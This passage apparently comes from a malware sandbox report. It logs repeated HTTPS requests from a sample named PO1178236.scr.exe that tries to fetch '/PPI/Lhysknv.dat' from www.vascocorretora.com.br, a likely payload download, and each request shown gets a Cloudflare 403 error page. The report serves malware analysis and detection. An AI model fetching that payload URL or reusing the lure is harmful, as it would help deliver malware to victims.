65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c109f9171a3c</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:03 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 30 39 66 39 31 37 31 61 33 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c109f9171a3c',t:'MTczNjQwODE2Mi4wMDAwMDA='};var a
        2025-01-09 07:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        12192.168.2.949719188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:03 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:03 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:03 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:18 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LkJ9MESB8MZwyUO84EPBQI5dPq6qFit%2BisOD5bDbd0pKAr3zD%2FSNo5FRQyT8xTK3UT%2B%2BoOXjSUQ65B%2FZ8qbBgntCnZSGcpUaP5Xn5bgdLZpSSxez15MhLjOGJD4okt03zISePoxqyFnB7TeK"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c10fa9a818b8-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1672&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1589548&cwnd=186&unsent_bytes=0&cid=5b71f39299aa2fe8&ts=220&x=0"
        2025-01-09 07:36:03 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:03 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:03 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:03 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 30 66 61 39 61 38 31 38 62 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c10fa9a818b8</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:03 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 30 66 61 39 61 38 31 38 62 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c10fa9a818b8',t:'MTczNjQwODE2My4wMDAwMDA='};v
        2025-01-09 07:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        13192.168.2.949720188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:04 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:04 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:04 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:19 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIVsx%2B4rvMCOxHunyfG9LjwWzL9OF02vjhceFqOETFwD0K6pqJpVISck5yGD25kSAWOFSBCQn3%2FlBWx9ffJNe3tnVX0w%2FdcpU1c2oRd0N9EhMMG1kugdPm%2FqZFDJOiDTVufC4Z6cV6xomri8"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1139fed43a5-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1588&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1780487&cwnd=252&unsent_bytes=0&cid=4beaa3495a0848a6&ts=136&x=0"
        2025-01-09 07:36:04 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:04 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:04 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:04 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 31 33 39 66 65 64 34 33 61 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1139fed43a5</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:04 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 31 33 39 66 65 64 34 33 61 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1139fed43a5',t:'MTczNjQwODE2NC4wMDAwMDA='};var
        2025-01-09 07:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        14192.168.2.949721188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:04 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:05 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:20 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2FPzcRX2%2B35wNm%2B6ZQhiQdlrYOLdWs96HBbh3hQC1POlgS1YQnvRs46sK2YalkbOSYSLUiQcMN65%2FDH7LYS8u4UQ0suPul8hLw%2BAFbkLtjNywDLjV5FB8NzFzvEfsWuYnYwCZ3RCCz57izcx"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1175ccff78d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1653&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1720683&cwnd=125&unsent_bytes=0&cid=9a03b50209bd50f7&ts=135&x=0"
        2025-01-09 07:36:05 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:05 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:05 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:05 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 31 37 35 63 63 66 66 37 38 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1175ccff78d</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:05 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 31 37 35 63 63 66 66 37 38 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1175ccff78d',t:'MTczNjQwODE2NS4wMDAwMDA='};v
        2025-01-09 07:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        15192.168.2.949722188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:05 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:05 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:05 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
